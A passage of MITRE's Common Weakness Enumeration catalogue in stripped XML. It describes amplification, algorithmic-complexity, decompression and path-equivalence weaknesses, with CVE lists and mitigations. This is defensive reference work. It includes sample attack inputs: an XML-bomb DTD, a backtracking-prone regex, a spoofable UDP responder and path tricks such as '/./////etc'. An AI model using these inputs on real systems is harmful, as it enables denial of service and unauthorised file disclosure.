/^((?=(\w+))\2\s?)*$/i; + var result = test_string.search(good_pattern); + + Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. + + + An adversary can cause significant resource + consumption on a server by filtering the cryptographic + algorithms offered by the client to the ones that are the + most resource-intensive on the server side. After + discovering which cryptographic algorithms are supported + by the server, a malicious client can send the initial + cryptographic handshake messages that contains only the + resource-intensive algorithms. For some cryptographic + protocols, these messages can be completely + prefabricated, as the resource-intensive part of the + handshake happens on the server-side first (such as TLS), + rather than on the client side. In the case of + cryptographic protocols where the resource-intensive part + should happen on the client-side first (such as SSH), a + malicious client can send a forged/precalculated + computation result, which seems correct to the server, so + the resource-intensive part of the handshake is going to + happen on the server side. A malicious client is required + to send only the initial messages of a cryptographic + handshake to initiate the resource-consuming part of the + cryptographic handshake. These messages are usually + small, and generating them requires minimal computational + effort, enabling a denial-of-service attack. An + additional risk is the fact that higher key size + increases the effectiveness of the attack. Cryptographic + protocols where the clients have influence over the size + of the used key (such as TLS 1.3 or SSH) are most at + risk, as the client can enforce the highest key size + supported by the server. + + + + + CVE-1999-0513 + Classic "Smurf" attack, using spoofed ICMP packets to broadcast addresses. + https://www.cve.org/CVERecord?id=CVE-1999-0513 + + + CVE-2003-1564 + Parsing library allows XML bomb + https://www.cve.org/CVERecord?id=CVE-2003-1564 + + + CVE-2004-2458 + Tool creates directories before authenticating user. + https://www.cve.org/CVERecord?id=CVE-2004-2458 + + + CVE-2020-10735 + Python has "quadratic complexity" issue when converting string to int with many digits in unexpected bases + https://www.cve.org/CVERecord?id=CVE-2020-10735 + + + CVE-2020-5243 + server allows ReDOS with crafted User-Agent strings, due to overlapping capture groups that cause excessive backtracking. + https://www.cve.org/CVERecord?id=CVE-2020-5243 + + + CVE-2013-5211 + composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses. + https://www.cve.org/CVERecord?id=CVE-2013-5211 + + + CVE-2002-20001 + Diffie-Hellman (DHE) Key Agreement Protocol allows attackers to send arbitrary numbers that are not public keys, which causes the server to perform expensive, unnecessary computation of modular exponentiation. + https://www.cve.org/CVERecord?id=CVE-2002-20001 + + + CVE-2022-40735 + The Diffie-Hellman Key Agreement Protocol allows use of long exponents, which are more computationally expensive than using certain "short exponents" with particular properties. + https://www.cve.org/CVERecord?id=CVE-2022-40735 + + + + + Asymmetric resource consumption (amplification) + + + A9 + Denial of Service + CWE More Specific + + + 41 + XML Attribute Blowup + + + TPS00-J + Use thread pools to enable graceful degradation of service during traffic bursts + + + FIO04-J + Release resources when they are no longer needed + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Szilárd Pfeiffer + Balasys IT Security + 2021-11-11 + Submitted content that led to modifications in applicable platforms, common consequences, potential mitigations, demonstrative examples, observed examples. + + + + + The product does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the product to transmit more traffic than should be allowed for that actor. + In the absence of a policy to restrict asymmetric resource consumption, the application or system cannot distinguish between legitimate transmissions and traffic intended to serve as an amplifying attack on target systems. Systems can often be configured to restrict the amount of traffic sent out on behalf of a client, based on the client's origin or access level. This is usually defined in a resource allocation policy. In the absence of a mechanism to keep track of transmissions, the system or application can be easily abused to transmit asymmetrically greater traffic than the request or client should be permitted to. + + + + + + + + + Operation + + + Architecture and Design + If the application uses UDP, then it could potentially be subject to spoofing attacks that use the inherent weaknesses of UDP to perform traffic amplification, although this problem can exist in other protocols or contexts. + + + Implementation + + + + + Availability + DoS: Amplification + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + System resources can be quickly consumed leading to poor application performance or system crash. This may affect network performance and could be used to attack other systems and applications relying on network performance. + + + + + Architecture and Design + Separation of Privilege + An application must make network resources available to a client commensurate with the client's access level. + + + Policy + Define a clear policy for network resource allocation and consumption. + + + Implementation + An application must, at all times, keep track of network resources and meter their usage appropriately. + + + + + This code listens on a port for DNS requests and sends the result to the requesting address. + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true: + data = sock.recvfrom(1024)if not data:break + (requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record) + + + + This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed ('spoofed'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic. + + + + + CVE-1999-0513 + Classic "Smurf" attack, using spoofed ICMP packets to broadcast addresses. + https://www.cve.org/CVERecord?id=CVE-1999-0513 + + + CVE-1999-1379 + DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker. + https://www.cve.org/CVERecord?id=CVE-1999-1379 + + + CVE-2000-0041 + Large datagrams are sent in response to malformed datagrams. + https://www.cve.org/CVERecord?id=CVE-2000-0041 + + + CVE-1999-1066 + Game server sends a large amount. + https://www.cve.org/CVERecord?id=CVE-1999-1066 + + + CVE-2013-5211 + composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses. + https://www.cve.org/CVERecord?id=CVE-2013-5211 + + + + + Network Amplification + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This can be resultant from weaknesses that simplify spoofing attacks. + Network amplification, when performed with spoofing, is normally a multi-channel attack from attacker (acting as user) to amplifier, and amplifier to victim. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Enabling_Factors_for_Exploitation, Name, Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Network Amplification + + + + An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached. + + + + + + + + + Quadratic Complexity + Used when the algorithmic complexity is related to the square of the number of inputs (N^2) + + + + + Architecture and Design + + + Implementation + + + Low + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + The typical consequence is CPU consumption, but memory consumption and consumption of other resources can also occur. + + + + + This example attempts to check if an input string is a "sentence" [REF-1164]. + + var test_string = "Bad characters: $@#"; + var bad_pattern = /^(\w+\s?)*$/i; + var result = test_string.search(bad_pattern); + + The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. + To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: + + var test_string = "Bad characters: $@#"; + var good_pattern = /^((?=(\w+))\2\s?)*$/i; + var result = test_string.search(good_pattern); + + Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. + + + + + CVE-2021-32617 + C++ library for image metadata has "quadratic complexity" issue with unnecessarily repetitive parsing each time an invalid character is encountered + https://www.cve.org/CVERecord?id=CVE-2021-32617 + + + CVE-2020-10735 + Python has "quadratic complexity" issue when converting string to int with many digits in unexpected bases + https://www.cve.org/CVERecord?id=CVE-2020-10735 + + + CVE-2020-5243 + server allows ReDOS with crafted User-Agent strings, due to overlapping capture groups that cause excessive backtracking. + https://www.cve.org/CVERecord?id=CVE-2020-5243 + + + CVE-2014-1474 + Perl-based email address parser has "quadratic complexity" issue via a string that does not contain a valid address + https://www.cve.org/CVERecord?id=CVE-2014-1474 + + + CVE-2003-0244 + CPU consumption via inputs that cause many hash table collisions. + https://www.cve.org/CVERecord?id=CVE-2003-0244 + + + CVE-2003-0364 + CPU consumption via inputs that cause many hash table collisions. + https://www.cve.org/CVERecord?id=CVE-2003-0364 + + + CVE-2002-1203 + Product performs unnecessary processing before dropping an invalid packet. + https://www.cve.org/CVERecord?id=CVE-2002-1203 + + + CVE-2001-1501 + CPU and memory consumption using many wildcards. + https://www.cve.org/CVERecord?id=CVE-2001-1501 + + + CVE-2004-2527 + Product allows attackers to cause multiple copies of a program to be loaded more quickly than the program can detect that other copies are running, then exit. This type of error should probably have its own category, where teardown takes more time than initialization. + https://www.cve.org/CVERecord?id=CVE-2004-2527 + + + CVE-2006-6931 + Network monitoring system allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a "backtracking attack." + https://www.cve.org/CVERecord?id=CVE-2006-6931 + + + CVE-2006-3380 + Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity. + https://www.cve.org/CVERecord?id=CVE-2006-3380 + + + CVE-2006-3379 + Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity. + https://www.cve.org/CVERecord?id=CVE-2006-3379 + + + CVE-2005-2506 + OS allows attackers to cause a denial of service (CPU consumption) via crafted Gregorian dates. + https://www.cve.org/CVERecord?id=CVE-2005-2506 + + + CVE-2005-1792 + Memory leak by performing actions faster than the software can clear them. + https://www.cve.org/CVERecord?id=CVE-2005-1792 + + + + Cryptography + + + + Algorithmic Complexity + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Functional_Areas, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2019-06-20 + updated Name, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated References + + + CWE Content Team + MITRE + 2022-10-13 + updated Alternate_Terms, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Algorithmic Complexity + + + + The product allows an entity to perform a legitimate but expensive operation before authentication or authorization has taken place. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Amplification + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash. + + + + + This data prints the contents of a specified file requested by a user. + + function printFile($username,$filename){ + + + //read file into string + $file = file_get_contents($filename);if ($file && isOwnerOf($username,$filename)){echo $file;return true;}else{echo 'You are not authorized to view this file';}return false; + } + + This code first reads a specified file into memory, then prints the file if the user is authorized to see its contents. The read of the file into memory may be resource intensive and is unnecessary if the user is not allowed to see the file anyway. + + + + + CVE-2004-2458 + Tool creates directories before authenticating user. + https://www.cve.org/CVERecord?id=CVE-2004-2458 + + + + + Early Amplification + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps authentication errors. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Early Amplification + + + + The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output. + An example of data amplification is a "decompression bomb," a small ZIP file that can produce a large amount of data when it is decompressed. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Availability + DoS: Amplification + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + System resources, CPU and memory, can be quickly consumed. This can lead to poor system performance or system crash. + + + + + The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. + + <?xml version="1.0"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO "A"><!ENTITY ONE "&ZERO;&ZERO;"><!ENTITY TWO "&ONE;&ONE;">...<!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;">]><data>&THIRTYTWO;</data> + + + + + + CVE-2009-1955 + XML bomb in web server module + https://www.cve.org/CVERecord?id=CVE-2009-1955 + + + CVE-2003-1564 + Parsing library allows XML bomb + https://www.cve.org/CVERecord?id=CVE-2003-1564 + + + + + Data Amplification + + + IDS04-J + Limit the size of files passed to ZipInputStream + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Data Amplification + Failure to Handle Highly Compressed Data (Data Amplification) + + + + The product is vulnerable to file system contents disclosure through path equivalence. Path equivalence involves the use of special characters in file and directory names. The associated manipulations are intended to generate multiple names for the same object. + Path equivalence is usually employed in order to circumvent access controls expressed using an incomplete set of file name or file path representations. This is different from path traversal, wherein the manipulations are performed to generate a name for a different object. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Access Control + Read Files or Directories + Modify Files or Directories + Bypass Protection Mechanism + An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism than an attacker may be able to bypass the mechanism. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-1114 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2000-1114 + + + CVE-2002-1986 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2002-1986 + + + CVE-2004-2213 + Source code disclosure using trailing dot or trailing encoding space "%20" + https://www.cve.org/CVERecord?id=CVE-2004-2213 + + + CVE-2005-3293 + Source code disclosure using trailing dot + https://www.cve.org/CVERecord?id=CVE-2005-3293 + + + CVE-2004-0061 + Bypass directory access restrictions using trailing dot in URL + https://www.cve.org/CVERecord?id=CVE-2004-0061 + + + CVE-2000-1133 + Bypass directory access restrictions using trailing dot in URL + https://www.cve.org/CVERecord?id=CVE-2000-1133 + + + CVE-2001-1386 + Bypass check for ".lnk" extension using ".lnk." + https://www.cve.org/CVERecord?id=CVE-2001-1386 + + + CVE-2001-0693 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-0693 + + + CVE-2001-0778 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-0778 + + + CVE-2001-1248 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2001-1248 + + + CVE-2004-0280 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2004-0280 + + + CVE-2005-0622 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2005-0622 + + + CVE-2005-1656 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2005-1656 + + + CVE-2002-1603 + Source disclosure via trailing encoded space "%20" + https://www.cve.org/CVERecord?id=CVE-2002-1603 + + + CVE-2001-0054 + Multi-Factor Vulnerability (MVF). directory traversal and other issues in FTP server using Web encodings such as "%20"; certain manipulations have unusual side effects. + https://www.cve.org/CVERecord?id=CVE-2001-0054 + + + CVE-2002-1451 + Trailing space ("+" in query string) leads to source code disclosure. + https://www.cve.org/CVERecord?id=CVE-2002-1451 + + + CVE-2000-0293 + Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal. + https://www.cve.org/CVERecord?id=CVE-2000-0293 + + + CVE-2001-1567 + "+" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file. + https://www.cve.org/CVERecord?id=CVE-2001-1567 + + + CVE-2002-0253 + Overlaps infoleak + https://www.cve.org/CVERecord?id=CVE-2002-0253 + + + CVE-2001-0446 + Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL. + https://www.cve.org/CVERecord?id=CVE-2001-0446 + + + CVE-2004-0334 + Bypass Basic Authentication for files using trailing "/" + https://www.cve.org/CVERecord?id=CVE-2004-0334 + + + CVE-2001-0893 + Read sensitive files with trailing "/" + https://www.cve.org/CVERecord?id=CVE-2001-0893 + + + CVE-2001-0892 + Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /. + https://www.cve.org/CVERecord?id=CVE-2001-0892 + + + CVE-2004-1814 + Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2004-1814 + + + BID:3518 + Source code disclosure + http://www.securityfocus.com/bid/3518 + + + CVE-2002-1483 + Read files with full pathname using multiple internal slash. + https://www.cve.org/CVERecord?id=CVE-2002-1483 + + + CVE-1999-1456 + Server allows remote attackers to read arbitrary files via a GET request with more than one leading / (slash) character in the filename. + https://www.cve.org/CVERecord?id=CVE-1999-1456 + + + CVE-2004-0578 + Server allows remote attackers to read arbitrary files via leading slash (//) characters in a URL request. + https://www.cve.org/CVERecord?id=CVE-2004-0578 + + + CVE-2002-0275 + Server allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL. + https://www.cve.org/CVERecord?id=CVE-2002-0275 + + + CVE-2004-1032 + Product allows local users to delete arbitrary files or create arbitrary empty files via a target filename with a large number of leading slash (/) characters. + https://www.cve.org/CVERecord?id=CVE-2004-1032 + + + CVE-2002-1238 + Server allows remote attackers to bypass access restrictions for files via an HTTP request with a sequence of multiple / (slash) characters such as http://www.example.com///file/. + https://www.cve.org/CVERecord?id=CVE-2002-1238 + + + CVE-2004-1878 + Product allows remote attackers to bypass authentication, obtain sensitive information, or gain access via a direct request to admin/user.pl preceded by // (double leading slash). + https://www.cve.org/CVERecord?id=CVE-2004-1878 + + + CVE-2005-1365 + Server allows remote attackers to execute arbitrary commands via a URL with multiple leading "/" (slash) characters and ".." sequences. + https://www.cve.org/CVERecord?id=CVE-2005-1365 + + + CVE-2000-1050 + Access directory using multiple leading slash. + https://www.cve.org/CVERecord?id=CVE-2000-1050 + + + CVE-2001-1072 + Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. + https://www.cve.org/CVERecord?id=CVE-2001-1072 + + + CVE-2004-0235 + Archive extracts to arbitrary files using multiple leading slash in filenames in the archive. + https://www.cve.org/CVERecord?id=CVE-2004-0235 + + + CVE-2002-1078 + Directory listings in web server using multiple trailing slash + https://www.cve.org/CVERecord?id=CVE-2002-1078 + + + CVE-2004-0847 + ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." + https://www.cve.org/CVERecord?id=CVE-2004-0847 + + + CVE-2000-0004 + Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL. + https://www.cve.org/CVERecord?id=CVE-2000-0004 + + + CVE-2002-0304 + Server allows remote attackers to read password-protected files via a /./ in the HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-0304 + + + BID:6042 + Input Validation error + http://www.securityfocus.com/bid/6042 + + + CVE-1999-1083 + Possibly (could be a cleansing error) + https://www.cve.org/CVERecord?id=CVE-1999-1083 + + + CVE-2004-0815 + "/./////etc" cleansed to ".///etc" then "/etc" + https://www.cve.org/CVERecord?id=CVE-2004-0815 + + + CVE-2002-0112 + Server allows remote attackers to view password protected files via /./ in the URL. + https://www.cve.org/CVERecord?id=CVE-2002-0112 + + + CVE-2004-0696 + List directories using desired path and "*" + https://www.cve.org/CVERecord?id=CVE-2004-0696 + + + CVE-2002-0433 + List files in web server using "*.ext" + https://www.cve.org/CVERecord?id=CVE-2002-0433 + + + CVE-2001-1152 + Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters. + https://www.cve.org/CVERecord?id=CVE-2001-1152 + + + CVE-2000-0191 + application check access for restricted URL before canonicalization + https://www.cve.org/CVERecord?id=CVE-2000-0191 + + + CVE-2005-1366 + CGI source disclosure using "dirname/../cgi-bin" + https://www.cve.org/CVERecord?id=CVE-2005-1366 + + + CVE-1999-0012 + Multiple web servers allow restriction bypass using 8.3 names instead of long names + https://www.cve.org/CVERecord?id=CVE-1999-0012 + + + CVE-2001-0795 + Source code disclosure using 8.3 file name. + https://www.cve.org/CVERecord?id=CVE-2001-0795 + + + CVE-2005-0471 + Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format. + https://www.cve.org/CVERecord?id=CVE-2005-0471 + + + + File or Directory + + + + Path Equivalence + + + FIO02-C + Canonicalize path names originating from untrusted sources + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Some of these manipulations could be effective in path traversal issues, too. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + 